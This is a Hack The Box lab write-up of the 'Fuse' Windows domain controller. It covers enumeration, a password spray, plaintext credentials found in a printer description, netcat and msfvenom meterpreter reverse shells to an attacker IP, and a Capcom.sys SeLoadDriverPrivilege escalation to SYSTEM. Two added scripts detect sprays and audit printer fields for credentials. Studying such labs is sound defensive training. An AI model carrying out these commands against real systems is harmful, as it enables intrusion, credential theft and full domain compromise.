Fuse

HTB Writeup

Let's start with an Nmap scan:

root@liberty:/home/kali# nmap -Pn -sC -sV fuse.htb
Starting Nmap 7.80 ( https://nmap.org ) 
Nmap scan report for fuse.htb (10.129.2.5)
Host is up (0.022s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
80/tcp   open  http         Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-09 13:58:10Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/9%Time=5F8068D4%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Take note of the domain:

Domain: fabricorp.local

It's at this point with most HTB machines that I'll add the hostname to /etc/hosts:

echo "X.X.X.X   fuse.fabricorp.local"  >> /etc/hosts
echo "X.X.X.X   fuse.htb"  >> /etc/hosts

Now let's enumerate the box with smbclient and enum4linux:

kali@liberty:~$ enum4linux fuse.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct  9 09:46:19 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... fuse.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================ 
|    Enumerating Workgroup/Domain on fuse.htb    |
 ================================================ 
[E] Can't find workgroup/domain


 ======================================== 
|    Nbtstat Information for fuse.htb    |
 ======================================== 
Looking up status of 10.129.2.5
No reply from 10.129.2.5
kali@liberty:~$ smbclient -L fuse.htb
Enter WORKGROUP\kali's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

Now let's take a look at port 80. After adding the host's FQDN to /etc/hosts we get the PaperCut print-log page (screenshot omitted here).

After downloading the CSV log files and grepping them for usernames we now have the following:

root@liberty:/home/kali# cat users.txt 
tlavel
sthompson
bhult
pmerton

Let's make a simple wordlist to accompany our newly found users. We can do this using CeWL, a tool that spiders a given URL to a specified depth, optionally following external links, and returns a list of words that can then be fed to password crackers such as John the Ripper.

kali@liberty:~$ cewl -d 5 -m 3 -w wordlist http://fuse.htb/papercut/logs/html/index.htm --with-numbers 
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
kali@liberty:~$ cat wordlist 
Print
2020
PaperCut
MFT01
PCL6
Logs
LETTER
NOT
DUPLEX
GRAYSCALE
Logger
papercut
com
CSV
Excel
Notepad
http
www
Size
sthompson
May
LONWK019
...

To spray these credentials against the SMB service with Metasploit's smb_login module:

msf5 auxiliary(scanner/smb/smb_login) > set pass_file wordlist
pass_file => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set user
set user_as_pass   set user_file      set userpass_file  
msf5 auxiliary(scanner/smb/smb_login) > set user_file users.txt
user_file => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS fuse.htb
RHOSTS => fuse.htb
msf5 auxiliary(scanner/smb/smb_login) > run

Using this module we discover working creds!

[+] 10.129.2.5:445        - 10.129.2.5:445 - Success: '.\tlavel:Fabricorp01'
[+] 10.129.2.5:445        - 10.129.2.5:445 - Success: '.\bhult:Fabricorp01'
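A defender-side check for the activity above, added here as an example and not part of the original writeup: spraying one password across harvested usernames shows up in the domain controller's Security log as a burst of event 4625 failures from one source against many different accounts, each failing only a few times. The script below looks for that low-and-wide shape in a constructed, flattened export (the field layout, timestamps and addresses are assumptions).

```python
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

# Constructed sample of Windows Security 4625 (logon failure) events, flattened
# to "timestamp|event id|target user|source ip|status" as a SIEM export might.
# 0xC000006A is "wrong password", 0xC0000064 "no such user". The first source
# mirrors a one-password spray across the harvested users above (made-up data).
SAMPLE_EVENTS = """\
2020-10-09T13:58:10|4625|tlavel|10.10.14.34|0xC000006A
2020-10-09T13:58:10|4625|sthompson|10.10.14.34|0xC000006A
2020-10-09T13:58:11|4625|bhult|10.10.14.34|0xC000006A
2020-10-09T13:58:11|4625|pmerton|10.10.14.34|0xC000006A
2020-10-09T13:58:12|4625|lonwk019|10.10.14.34|0xC0000064
2020-10-09T13:58:13|4625|tlavel|10.10.14.34|0xC000006A
2020-10-09T14:20:00|4625|dandrews|10.10.14.77|0xC000006A
2020-10-09T14:20:05|4625|dandrews|10.10.14.77|0xC000006A
2020-10-09T14:20:09|4625|dandrews|10.10.14.77|0xC000006A
"""

Event = namedtuple("Event", "ts event user src status")

def parse_events(text):
    """Parse the flattened export into Event tuples (usernames lower-cased)."""
    events = []
    for line in text.splitlines():
        ts, ev, user, src, status = line.split("|")
        events.append(Event(datetime.fromisoformat(ts), ev, user.lower(), src, status))
    return events

def detect_spray(events, window=timedelta(minutes=5), min_users=4, max_per_user=3):
    """Flag sources whose failed logons hit at least min_users distinct accounts
    inside any window-long span while no single account fails more than
    max_per_user times there (a spray, as opposed to a brute force of one user).
    Returns {source_ip: sorted list of targeted users} for the widest such span."""
    by_src = defaultdict(list)
    for e in events:
        if e.event == "4625":
            by_src[e.src].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end, e in enumerate(evs):
            # Slide the window start forward so evs[start:end+1] spans <= window.
            while e.ts - evs[start].ts > window:
                start += 1
            per_user = defaultdict(int)
            for x in evs[start:end + 1]:
                per_user[x.user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if len(per_user) > len(alerts.get(src, ())):
                    alerts[src] = sorted(per_user)
    return alerts
```

Tune min_users and the window to the environment; the 0xC0000064 failures for names that are not accounts at all (here a hostname lifted from the print logs) are a useful extra signal that the username list was scraped rather than typed.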

Let's circle back to our enumeration now that we have working creds:

root@liberty:/home/kali# smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\bhult's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

These creds worked in the Metasploit module, so why aren't they working now? NT_STATUS_PASSWORD_MUST_CHANGE means the password is correct but the account is flagged to change it at next logon, so no session can be set up until a new one is set. Let's go with the error message and change the password. We can do this with smbpasswd:

A password policy is enforced, as the first attempt below shows, so I changed my password to Fabricorp02:

root@liberty:/home/kali# smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
machine fuse.htb rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
root@liberty:/home/kali# smbpasswd -r fuse.htb -U bhult
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bhult on fuse.htb.
root@liberty:/home/kali# smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\bhult's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

I tried connecting over PowerShell but wasn't getting anywhere, so I moved on to rpcclient, another great tool for enumeration:

PS /home/kali> New-PSSession -ComputerName fuse.htb -Credential tvlavel  

PowerShell credential request
Enter your credentials.
Password for user tvlavel: ************

New-PSSession: MI_RESULT_ACCESS_DENIED
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 		0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 		0:3 (0x0:0x3)
SeLockMemoryPrivilege 		0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 		0:5 (0x0:0x5)
SeMachineAccountPrivilege 		0:6 (0x0:0x6)
SeTcbPrivilege 		0:7 (0x0:0x7)
SeSecurityPrivilege 		0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 		0:9 (0x0:0x9)
SeLoadDriverPrivilege 		0:10 (0x0:0xa)
SeSystemProfilePrivilege 		0:11 (0x0:0xb)
SeSystemtimePrivilege 		0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 		0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 		0:14 (0x0:0xe)
SeCreatePagefilePrivilege 		0:15 (0x0:0xf)
SeCreatePermanentPrivilege 		0:16 (0x0:0x10)
SeBackupPrivilege 		0:17 (0x0:0x11)
SeRestorePrivilege 		0:18 (0x0:0x12)
SeShutdownPrivilege 		0:19 (0x0:0x13)
SeDebugPrivilege 		0:20 (0x0:0x14)
SeAuditPrivilege 		0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 		0:22 (0x0:0x16)
SeChangeNotifyPrivilege 		0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 		0:24 (0x0:0x18)
SeUndockPrivilege 		0:25 (0x0:0x19)
SeSyncAgentPrivilege 		0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 		0:27 (0x0:0x1b)
SeManageVolumePrivilege 		0:28 (0x0:0x1c)
SeImpersonatePrivilege 		0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 		0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 		0:31 (0x0:0x1f)
SeRelabelPrivilege 		0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 		0:33 (0x0:0x21)
SeTimeZonePrivilege 		0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 		0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 		0:36 (0x0:0x24)

Let's take note of the new users discovered above, in particular the two service accounts svc-print and svc-scan.

After running through most of the enumeration commands I came across this gem:

rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.10.10.193\HP-MFT01]
	description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:[]

We now have another credential, stored in plain text in the printer's description!
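The description rpcclient prints is the spooler's PRINTER_INFO_1 string (name,driver,location), so the password above was typed into the printer's Location field, which any authenticated user can read. As an added example that is not part of the original writeup, here is an audit that parses enumprinters output and reports credential-looking text in those free-text fields with the secret redacted; the sample block, host names and secret are constructed.

```python
import re

# Constructed sample in the layout `rpcclient $> enumprinters` prints: one
# indented key:[value] line per attribute, one block per printer. The first
# description mirrors the finding above; host names and the secret are made up.
SAMPLE_ENUMPRINTERS = """\
\tflags:[0x800000]
\tname:[\\\\dc01.example.local\\HP-MFT01]
\tdescription:[\\\\dc01.example.local\\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: Secret123!)]
\tcomment:[]
\tflags:[0x800000]
\tname:[\\\\dc01.example.local\\LOBBY-PRN]
\tdescription:[\\\\dc01.example.local\\LOBBY-PRN,HP Universal Printing PCL 6,Reception desk]
\tcomment:[Toner lives in the supply cupboard]
"""

FIELD_RE = re.compile(r"^\s*(\w+):\[(.*)\]\s*$")
# A credential keyword followed by ':' or '=' and a value; the value stops at
# whitespace, a comma or a closing parenthesis so the surrounding text survives.
SECRET_RE = re.compile(r"\b(pass(?:word|wd|phrase)?|pwd|pin|secret)\s*[:=]\s*([^\s,)]+)", re.I)

def parse_enumprinters(text):
    """Group rpcclient's key:[value] lines into one dict per printer; each
    'flags' line starts a new printer."""
    printers, current = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "flags":
            current = {}
            printers.append(current)
        if current is not None:
            current[key] = value
    return printers

def find_embedded_secrets(printers, fields=("description", "comment", "location")):
    """Return (printer name, field, redacted value) for every free-text field
    that looks like it carries a credential. The secret itself is replaced so
    the report can be shared without re-leaking it."""
    findings = []
    for p in printers:
        for f in fields:
            value = p.get(f, "")
            if SECRET_RE.search(value):
                redacted = SECRET_RE.sub(lambda m: m.group(0)[:-len(m.group(2))] + "<redacted>", value)
                findings.append((p.get("name", "?"), f, redacted))
    return findings
```

The same free-text fields are published in AD printQueue objects when printers are listed in the directory, so an LDAP export of those attributes can be fed through find_embedded_secrets as well.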

Since PowerShell remoting from Kali is out of the window, let's use evil-winrm:

root@liberty:/home/kali# evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> 

We can use these credentials to grab the user flag:

*Evil-WinRM* PS C:\Users\svc-print\Desktop> type user.txt
INSERT FLAG HERE
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Now that we have access, let's grab a shell with netcat:

root@liberty:/home/kali# evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb -s /home/kali/scripts

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> upload /usr/share/windows-resources/binaries/nc.exe
Info: Uploading /usr/share/windows-resources/binaries/nc.exe to C:\Users\svc-print\Documents\nc.exe

                                                             
Data: 79188 bytes of 79188 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print\Documents> nc.exe 10.10.14.34 443 -e cmd.exe
The term 'nc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ nc.exe 10.10.14.34 443 -e cmd.exe
+ ~~~~~~
    + CategoryInfo          : ObjectNotFound: (nc.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\svc-print\Documents> ./nc.exe 10.10.14.34 443 -e cmd.exe
root@liberty:/home/kali# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.34] from (UNKNOWN) [10.129.2.5] 63136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\svc-print\Documents>

Let's begin our privilege escalation with Windows Exploit Suggester - Next Generation (WES-NG), which needs the output of systeminfo:

C:\Users\svc-print\Documents>systeminfo.exe > info.txt
systeminfo.exe > info.txt
Access is denied.

Or let's not, since systeminfo is denied to this account.

Let's get a Meterpreter shell up there while we are at it:

kali@liberty:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.34 LPORT=4444 -f dll shell.dll > shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of dll file: 5120 bytes
*Evil-WinRM* PS C:\Users\svc-print\Documents> upload shell.exe
Info: Uploading shell.exe to C:\Users\svc-print\Documents\shell.exe

                                                             
Data: 98400 bytes of 98400 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print\Documents> dir


    Directory: C:\Users\svc-print\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/9/2020  10:16 AM          73802 shell.exe
-a----        10/9/2020  10:01 AM          16664 Sherlock.ps1

Next you'll want to create a resource file to quickly launch your handler:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
root@liberty:/home/kali# msfconsole -r shell.rc

[*] Processing shell.rc for ERB directives.
resource (shell.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (shell.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (shell.rc)> set LHOST 10.10.14.34
LHOST => 10.10.14.34
resource (shell.rc)> set LPORT 4444
LPORT => 4444
resource (shell.rc)> set ExitOnSession false
ExitOnSession => false
resource (shell.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.34:4444 
msf5 exploit(multi/handler) > 

We now have the ability to interact with the host via a netcat shell or a meterpreter session.

Now let's get back to our privilege escalation. The whoami output above shows svc-print is a member of BUILTIN\Print Operators and holds SeLoadDriverPrivilege, which this Tarlogic article shows can be abused to load a driver and escalate to SYSTEM (on a domain controller, Print Operators membership is therefore effectively domain-admin equivalent):

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

The article references PoC code (EoPLoadDriver and ExploitCapcom, linked at the end of this writeup), which relies on the signed but vulnerable Capcom.sys driver; that driver is a well-known entry on vulnerable-driver blocklists, so a hardened host would refuse to load it.

Let's download the PoC and compile the loader on our Kali machine:

root@liberty:/opt/EoPLoadDriver# x86_64-w64-mingw32-gcc eoploaddriver.cpp -o poc.exe

Now we can reconnect, upload the exploit together with the Capcom driver, and root the box:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> cd C:\Temp
*Evil-WinRM* PS C:\Temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
*Evil-WinRM* PS C:\Temp> .\ExploitCapcom_shell.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000002138D100008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
root@liberty:/home/kali/SeLoadDriverPrivilege# nc -nvlp 445
listening on [any] 445 ...
connect to [10.10.14.45] from (UNKNOWN) [10.129.2.5] 50946
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Temp>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
INSERT FLAG HERE

C:\Users\Administrator\Desktop>
Links referenced in this writeup:

smbpasswd
Password Spraying & Other Fun with RPCCLIENT - Black Hills Information Security
Abusing SeLoadDriverPrivilege for privilege escalation - Tarlogic Security (https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
GitHub - TarlogicSecurity/EoPLoadDriver: Proof of concept for abusing SeLoadDriverPrivilege (Privilege Escalation in Windows)
GitHub - tandasat/ExploitCapcom: This is a standalone exploit for a vulnerable feature in Capcom.sys
Fuse.HTB Home Page